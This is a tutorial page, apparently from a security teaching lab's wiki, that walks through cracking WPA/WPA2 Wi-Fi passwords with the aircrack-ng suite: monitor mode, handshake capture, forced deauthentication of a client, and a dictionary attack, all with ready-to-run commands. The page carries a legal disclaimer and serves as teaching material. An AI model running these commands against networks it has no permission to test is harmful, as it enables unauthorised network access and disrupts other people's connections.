Aircrack-ng: How to crack WPA/WPA2 passwords

From Embedded Lab Vienna for IoT & Security
Jump to: navigation, search

Summary

This documentation is a step-by-step guide explaining how to use the aircrack-ng program suite to crack passwords of Wireless Access Points using WPA or WPA2. The guide is meant for usage on *NIX systems capable of installing and running aircrack-ng. Results are based on tests that were run on the Kali Linux custom image for VMware (Kali Linux 2020.4 64bit) wich is maintained and provided by Offensive Security [1]. The used client software was VMware Workstation Pro 16.1.0 build-17198959 and the used host system was Windows 10 Home Edition (64 bit).

Requirements

  • Operating system: Kali Linux
  • Packages: aicrack-ng program suite

If you want to install aircrack-ng from source, click here [2] to access the official documentation.

On the image that was used (Kali Linux 2020.4 64bit for VMware by Offensive Security), the aicrack-ng program suite is already preinstalled. Just type sudo aircrack-ng in the shell to get an overview of available options. You will only need a few specific programs and options for cracking WPA/WPA2 PSK, which are explained in the following sections.

Description

If you want to learn more about the inner workings of aicrack-ng's WPA/WPA2 PSK cracking, you can read more on the section about Password Cracking.

Before we get down to the nitty-gritty, there is some information that has to be known to be able to "get cracking".

What we need:

 MAC address of machine running aircrack-ng suite
 MAC address of wireless client using WPA/WPA2
 BSSID (MAC address of victim access point)
 ESSID (Wireless network name)
 Access point channel number
 Wireless interface name

We need all of this to fill out the necessary portions of the following commands.

The guide itself was summarized from official documentation [3] and tested in my home network.

Disclaimer: The following guide must not be used on networks without permission. Doing so is illegal and can result in criminal charges.

How to use aircrack-ng for cracking

 1. Start the wireless interface in monitor mode on the specific AP channel
 2. Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
 3. Use aireplay-ng to deauthenticate the wireless client
 4. Run aircrack-ng to crack the pre-shared key using the authentication handshake

Used Hardware

Before we start, there is one thing more that needs to be addressed. To be able to capture and inject packets, it is neccessary to put the network interface card (NIC) of the machine running the aircrack-ng program suite into so called "promiscuous mode". In general, NICs do not use this mode, as they do not need to read packets that are not addressed to them. Since we are trying to do something "out of the ordinary" here (e.g. capture all network traffic and inject our own packets) we can only succeed if our NIC knows that it should do exactly that.

This can be done by either manually updating the drivers [4], which can be quite cumbersome, or by buying a Wireless USB Adapter using a chipset that is supported by the machine running the aircrack-ng suite. In our special case, we do not even have the freedom of doing our own dirty work - according to Kali Linux official documentation regarding virtual machines, we are forced to use an adapter, as patching only works in a native environment.

The problem is that a lot of products are available who promise to do what we want, but not a lot of them actually work. Oftentimes, chipsets are not compatible with Kali Linux, which would make the device unusable for our purposes. For this specific documentation, the USB Wireless Adapter "Panda Wireless PAU05" for 802.11n was used, and the product version was 2.6.15. If you use this device, you should be fine - but only in 2.4 Ghz range. Also, high digit channels like 111 are not supported. Sorry!

If you want to be 100% sure if your device is up to the job, you can manually test injection capabilities by entering the following commmand in the shell:

 sudo aireplay-ng -9 -e <ESSID> -a <BSSID> <interface>
   -9 means injection test
   -e is the wireless network name that is shown (ESSID)
   -a is the MAC address of the victim access point (BSSID)
   <interface> is the wireless interface name from the machine you are running aircrack-ng on

Step 1

Use airmon-ng to disable the network-manager service and prevent it from overwriting our settings, and to start capturing traffic on the channel used by the victim AP.

Enter these commands in the shell

 sudo airmon-ng check kill
 sudo airmon-ng start <interface> <channel>

Step 2

Start airodump-ng on the AP channel to collect the 4-way-handshake (only occurs when a client connects to the AP)

Enter this command in the shell

 sudo airodump-ng -c <channel> --bssid <BSSID> -w psk <interface>
   -c is the number of the channel used by the wireless access point
   --bssid is the MAC address of the victim access point. This eliminates extraneous traffic.
   -w psk is the file name prefix for the file which will contain the IVs. Captured files are saved automatically to the folder you run aircrack-ng from.
   <interface> is the interface name.

Step 3

Use aireplay-ng to deauthenticate AP client. You need this to force it to reconnect if it was already connected to the AP when you started capturing traffic. You need the 4-way-handshake for cracking, and if you do not deauthenticate the client by force (through packet injection) you will have to wait until it disconnects and reconnects again, which can take a long time, or maybe will not happen at all. This is why you need a NIC or Adapter that is capable of packet injection.

Enter this command in the shell

 sudo aireplay-ng -0 1 -a <BSSID> -c <client> <interface>
   -0 means deauthentication
   1 is the number of deauths to send (you can send multiple if you wish)
   -a is the MAC address of the victim access point
   -c is the MAC address of the wireless client you are deauthing
   <interface> is the interface name

Step 4

Run aircrack-ng to start a dictionary attack on the PCAP file (the file containing all the captured packets).

Enter this command in the shell

 sudo aircrack-ng -w /link/to/passwordlist -b <BSSID> psk*.cap
   -w is the full path to the dictionary file used for cracking. You don't need to specify full path if the file is located in the same directory.
   *.cap is the extension of files containing captured packets. Through usind the wildcard * all files are included that have the *.psk ending.

Important: You need to use a dictionary attack to be able to crack WPA/WPA2 passwords. Brute forcing does not work. Cracking WPA/WPA2 passwords after getting the 4-way-handshake will only work if the password is in the list. If the victim AP makes use of a randomly generated password of a certain (large) size, our chances of getting the password will be next to nil. So always choose a robust password for your own setup, to make evil hackers lifes miserable!

Other Guides

  • Getting started with aircrack-ng [5] (2013)
  • Setting up Kali Linux on Raspberry Pi [6] (2017)

References